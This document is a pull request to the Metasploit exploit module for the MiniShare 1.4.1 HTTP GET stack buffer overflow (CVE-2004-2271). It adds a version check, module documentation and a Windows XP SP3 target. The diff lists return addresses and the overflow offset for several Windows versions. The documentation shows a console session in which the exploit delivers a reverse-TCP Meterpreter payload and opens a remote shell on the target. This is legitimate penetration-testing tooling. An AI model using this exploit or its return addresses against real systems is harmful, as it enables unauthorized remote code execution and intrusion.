### PR TITLE
minishare_get_overflow - Add check method and additional Windows targets

### DIFF
--- a/documentation/modules/exploit/windows/http/minishare_get_overflow.md
+++ b/documentation/modules/exploit/windows/http/minishare_get_overflow.md
@@ -1,0 +1,84 @@
+## Description
+
+  This is a simple buffer overflow for the MiniShare web
+  server. This flaw affects all versions prior to 1.4.2. This
+  is a plain stack buffer overflow that requires a "jmp esp" to reach
+  the payload, making this difficult to target many platforms
+  at once.
+
+
+## Vulnerable Application
+
+  This module has been successfully tested against MiniShare 1.4.1.
+
+  Version 1.3.4 and below do not seem to be vulnerable.
+
+
+## Targets
+
+Exploit targets:
+
+```
+   Id  Name
+   --  ----
+   0   Automatic
+   1   Windows 2000 SP0-SP3 English
+   2   Windows 2000 SP4 English
+   3   Windows XP SP0-SP1 English
+   4   Windows XP SP2 English
+   5   Windows 2003 SP0 English
+   6   Windows 2003 SP1 English
+   7   Windows 2003 SP2 English
+   8   Windows NT 4.0 SP6
+   9   Windows XP SP2 Polish
+   10  Windows XP SP3 English
+   11  Windows XP SP3 French
+```
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. `use exploit/windows/http/minishare_get_overflow`
+  3. `set rhosts <RHOST>`
+  4. `set target <TARGET>`
+  5. `check`
+  6. `run`
+  7. You should get a new session
+
+
+## Scenarios
+
+### MiniShare 1.4.1 on Windows XP SP 3 English
+
+  ```
+  msf5 > use exploit/windows/http/minishare_get_overflow 
+  msf5 exploit(windows/http/minishare_get_overflow) > set rhosts
+  rhosts => 172.16.191.158
+  msf5 exploit(windows/http/minishare_get_overflow) > set target 10
+  target => 10
+  msf5 exploit(windows/http/minishare_get_overflow) > set verbose true
+  verbose => true
+  msf5 exploit(windows/http/minishare_get_overflow) > check
+
+  [*] MiniShare version 1.4.1
+  [*] 172.16.191.158:80 - The target appears to be vulnerable.
+  msf5 exploit(windows/http/minishare_get_overflow) > set payload windows/meterpreter/reverse_tcp
+  payload => windows/meterpreter/reverse_tcp
+  msf5 exploit(windows/http/minishare_get_overflow) > run
+
+  [*] Started reverse TCP handler on 172.16.191.196:4444 
+  [*] Trying target address 0x7e429353...
+  [*] Sending stage (179779 bytes) to 172.16.191.158
+  [*] Meterpreter session 10 opened (172.16.191.196:4444 -> 172.16.191.158:1163) at 2018-12-29 06:47:47 -0500
+
+  meterpreter > sysinfo
+  Computer        : WINXP
+  OS              : Windows XP (Build 2600, Service Pack 3).
+  Architecture    : x86
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x86/windows
+  meterpreter > 
+  ```

--- a/modules/exploits/windows/http/minishare_get_overflow.rb
+++ b/modules/exploits/windows/http/minishare_get_overflow.rb
@@ -10,9 +10,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Minishare 1.4.1 Buffer Overflow',
+      'Name'           => 'MiniShare 1.4.1 Buffer Overflow',
       'Description'    => %q{
-          This is a simple buffer overflow for the minishare web
+          This is a simple buffer overflow for the MiniShare web
         server. This flaw affects all versions prior to 1.4.2. This
         is a plain stack buffer overflow that requires a "jmp esp" to reach
         the payload, making this difficult to target many platforms
@@ -23,10 +23,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'        => BSD_LICENSE,
       'References'     =>
         [
-          [ 'CVE', '2004-2271'],
-          [ 'OSVDB', '11530'],
-          [ 'BID', '11620'],
-          [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html'],
+          ['CVE', '2004-2271'],
+          ['BID', '11620'],
+          ['URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html'],
+          ['URL', 'https://securitytracker.com/id?1012106']
         ],
       'Privileged'     => false,
       'Payload'        =>
@@ -39,24 +39,58 @@ class MetasploitModule < Msf::Exploit::Remote
       'Platform'       => 'win',
       'Targets'        =>
         [
-          ['Windows 2000 SP0-SP3 English', { 'Rets' => [ 1787, 0x7754a3ab ]}], # jmp esp
-          ['Windows 2000 SP4 English',     { 'Rets' => [ 1787, 0x7517f163 ]}], # jmp esp
-          ['Windows XP SP0-SP1 English',   { 'Rets' => [ 1787, 0x71ab1d54 ]}], # push esp, ret
-          ['Windows XP SP2 English',       { 'Rets' => [ 1787, 0x71ab9372 ]}], # push esp, ret
-          ['Windows 2003 SP0 English',     { 'Rets' => [ 1787, 0x71c03c4d ]}], # push esp, ret
-          ['Windows 2003 SP1 English',     { 'Rets' => [ 1787, 0x77403680 ]}], # jmp esp
-          ['Windows 2003 SP2 English',     { 'Rets' => [ 1787, 0x77402680 ]}], # jmp esp
-          ['Windows NT 4.0 SP6',           { 'Rets' => [ 1787, 0x77f329f8 ]}], # jmp esp
-          ['Windows XP SP2 German',        { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
-          ['Windows XP SP2 Polish',        { 'Rets' => [ 1787, 0x77d4e26e ]}], # jmp esp
-          ['Windows XP SP2 French',        { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
-          ['Windows XP SP3 French',        { 'Rets' => [ 1787, 0x7e3a9353 ]}], # jmp esp
+          #['Windows 7 SP1 (x64) English',     { 'Rets' => [ 1787, 0x7dc7fcdb ]}], # jmp esp @ user32.dll (aslr disabled)
+          #['Windows 7 SP1 (x86) English',     { 'Rets' => [ 1787, 0x77d34e5b ]}], # jmp esp @ user32.dll (aslr disabled)
+          #['Windows Vista SP0 (x86) English', { 'Rets' => [ 1787, 0x77d8fae1 ]}], # jmp esp @ user32.dll (aslr disabled)
+          ['Windows 2000 SP0-SP3 English',    { 'Rets' => [ 1787, 0x7754a3ab ]}], # jmp esp
+          ['Windows 2000 SP4 English',        { 'Rets' => [ 1787, 0x7517f163 ]}], # jmp esp
+          ['Windows XP SP0-SP1 English',      { 'Rets' => [ 1787, 0x71ab1d54 ]}], # push esp, ret
+          ['Windows XP SP2 English',          { 'Rets' => [ 1787, 0x71ab9372 ]}], # push esp, ret
+          ['Windows 2003 SP0 English',        { 'Rets' => [ 1787, 0x71c03c4d ]}], # push esp, ret
+          ['Windows 2003 SP1 English',        { 'Rets' => [ 1787, 0x77403680 ]}], # jmp esp
+          ['Windows 2003 SP2 English',        { 'Rets' => [ 1787, 0x77402680 ]}], # jmp esp
+          ['Windows NT 4.0 SP6',              { 'Rets' => [ 1787, 0x77f329f8 ]}], # jmp esp @ kernel32.dll
+          #['Windows XP SP2 German',           { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
+          ['Windows XP SP2 Polish',           { 'Rets' => [ 1787, 0x77d4e26e ]}], # jmp esp
+          #['Windows XP SP2 French',           { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
+          ['Windows XP SP3 English',          { 'Rets' => [ 1787, 0x7e429353 ]}], # jmp esp @ user32.dll
+          ['Windows XP SP3 French',           { 'Rets' => [ 1787, 0x7e3a9353 ]}], # jmp esp
         ],
       'DefaultOptions' =>
         {
           'WfsDelay' => 30
         },
       'DisclosureDate' => 'Nov 7 2004'))
+  end
+
+  def check
+    res = send_request_cgi('uri' => target_uri.path)
+
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Safe
+    end
+
+    unless res.body.include? 'MiniShare'
+      vprint_status 'Target is not a MiniShare server'
+      return CheckCode::Safe
+    end
+
+    version = res.body.scan(/>MiniShare ([\d\.]+)</).flatten.first
+
+    if version.blank?
+      vprint_status 'Could not determine MiniShare version'
+      return CheckCode::Detected
+    end
+
+    vprint_status "MiniShare version #{version}"
+
+    if Gem::Version.new(version) > Gem::Version.new('1.3.4') &&
+       Gem::Version.new(version) < Gem::Version.new('1.4.2')
+      return CheckCode::Appears
+    end
+
+    CheckCode::Safe
   end
 
   def exploit


### PR DESCRIPTION
:birthday: :birthday: :birthday: Happy 14th birthday CVE-2004-2271 :birthday: :birthday: :birthday:

This PR adds a `check` method and module documentation. It also adds a Windows XP SP 3 English target.

It also comments out two targets which contain `0x0a` which is a bad character. Presumably these targets were never tested.
